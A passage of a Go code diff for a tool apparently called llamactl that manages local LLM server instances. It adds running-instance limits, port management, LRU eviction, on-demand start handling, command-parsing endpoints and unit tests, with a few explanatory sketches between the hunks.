delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
@@ -168,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
@@ -191,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
@@ -200,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
@@ -240,3 +252,65 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}


@@ -0,0 +1,237 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}


@@ -1,6 +1,10 @@
package manager
import "log"
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
@@ -24,3 +28,37 @@ func (im *instanceManager) checkAllTimeouts() {
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}
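A runnable sketch of the LRU selection rule above: among running instances with an idle timeout enabled, the one with the oldest last-request time is evicted. The instance type below is a stand-in, not pkg/instance.Process:

package main

import (
	"fmt"
	"time"
)

// fakeInstance stands in for instance.Process: an idle timeout of <= 0 marks
// the instance as exempt from eviction, matching the skip in EvictLRUInstance.
type fakeInstance struct {
	name        string
	idleTimeout int // minutes
	lastRequest time.Time
}

func pickLRU(running []fakeInstance) (string, error) {
	var lru *fakeInstance
	for i := range running {
		inst := &running[i]
		if inst.idleTimeout <= 0 {
			continue // never evict instances without an idle timeout
		}
		if lru == nil || inst.lastRequest.Before(lru.lastRequest) {
			lru = inst
		}
	}
	if lru == nil {
		return "", fmt.Errorf("failed to find lru instance")
	}
	return lru.name, nil
}

func main() {
	now := time.Now()
	evicted, err := pickLRU([]fakeInstance{
		{name: "a", idleTimeout: 1, lastRequest: now.Add(-3 * time.Minute)},
		{name: "b", idleTimeout: 1, lastRequest: now.Add(-1 * time.Minute)},
		{name: "c", idleTimeout: 0, lastRequest: now.Add(-10 * time.Minute)}, // exempt
	})
	fmt.Println(evicted, err) // a <nil>
}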

pkg/manager/timeout_test.go (new file, 332 lines)

@@ -0,0 +1,332 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
MLX: config.BackendSettings{Command: "mlx_lm.server"},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(backendConfig, cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
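A small, self-contained sketch of the injected-clock pattern these tests rely on; the interface and field names below are illustrative, not the actual pkg/instance API:

package main

import (
	"fmt"
	"time"
)

// timeProvider is the injected clock the timeout tests swap out so they can
// advance time without sleeping.
type timeProvider interface {
	Now() time.Time
}

type fixedClock struct{ t time.Time }

func (f *fixedClock) Now() time.Time { return f.t }

type proc struct {
	clock       timeProvider
	idleMinutes int
	lastRequest time.Time
}

func (p *proc) shouldTimeout() bool {
	if p.idleMinutes <= 0 {
		return false // no timeout configured
	}
	idle := p.clock.Now().Sub(p.lastRequest)
	return idle >= time.Duration(p.idleMinutes)*time.Minute
}

func main() {
	start := time.Now()
	clock := &fixedClock{t: start}
	p := &proc{clock: clock, idleMinutes: 1, lastRequest: start}
	fmt.Println(p.shouldTimeout()) // false: no idle time has passed yet
	clock.t = start.Add(2 * time.Minute)
	fmt.Println(p.shouldTimeout()) // true: past the 1-minute idle timeout
}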


@@ -5,6 +5,10 @@ import (
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
@@ -47,12 +51,12 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
@@ -69,12 +73,12 @@ func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
@@ -91,12 +95,12 @@ func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
@@ -272,6 +276,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -451,7 +461,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
if !inst.Running {
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
@@ -541,7 +551,7 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or model name"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
@@ -554,7 +564,7 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
}
r.Body.Close()
// Parse the body to extract model name
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
@@ -563,35 +573,48 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
http.Error(w, "Model name is required", http.StatusBadRequest)
http.Error(w, "Instance name is required", http.StatusBadRequest)
return
}
// Route to the appropriate inst based on model name
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !inst.Running {
if inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart {
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} else {
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := inst.GetProxy()
@@ -610,3 +633,163 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
proxy.ServeHTTP(w, r)
}
}
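A condensed, runnable sketch of the start-up decision added to OpenAIProxy above: a stopped instance is only started when on-demand start is enabled, and a full manager either evicts the LRU instance (when LRU eviction is enabled) or returns a conflict. The types below are stand-ins for the real handler/manager wiring:

package main

import (
	"errors"
	"fmt"
)

// deps bundles the checks the handler performs; each field is a stand-in for
// a call on the instance manager or instance.
type deps struct {
	running       bool
	onDemandStart bool
	maxReached    bool
	lruEviction   bool
	evict         func() error
	start         func() error
	waitHealthy   func() error
}

func ensureRunning(d deps) error {
	if d.running {
		return nil
	}
	if !d.onDemandStart {
		return errors.New("instance is not running")
	}
	if d.maxReached {
		if !d.lruEviction {
			return errors.New("maximum number of instances reached")
		}
		if err := d.evict(); err != nil {
			return fmt.Errorf("failed to evict instance: %w", err)
		}
	}
	if err := d.start(); err != nil {
		return fmt.Errorf("failed to start instance: %w", err)
	}
	return d.waitHealthy() // block until healthy or timeout
}

func main() {
	err := ensureRunning(deps{
		onDemandStart: true,
		maxReached:    true,
		lruEviction:   true,
		evict:         func() error { return nil },
		start:         func() error { return nil },
		waitHealthy:   func() error { return nil },
	})
	fmt.Println(err) // <nil>: evicted the LRU instance, started, became healthy
}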
// ParseCommandRequest represents the request body for command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: llamaOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
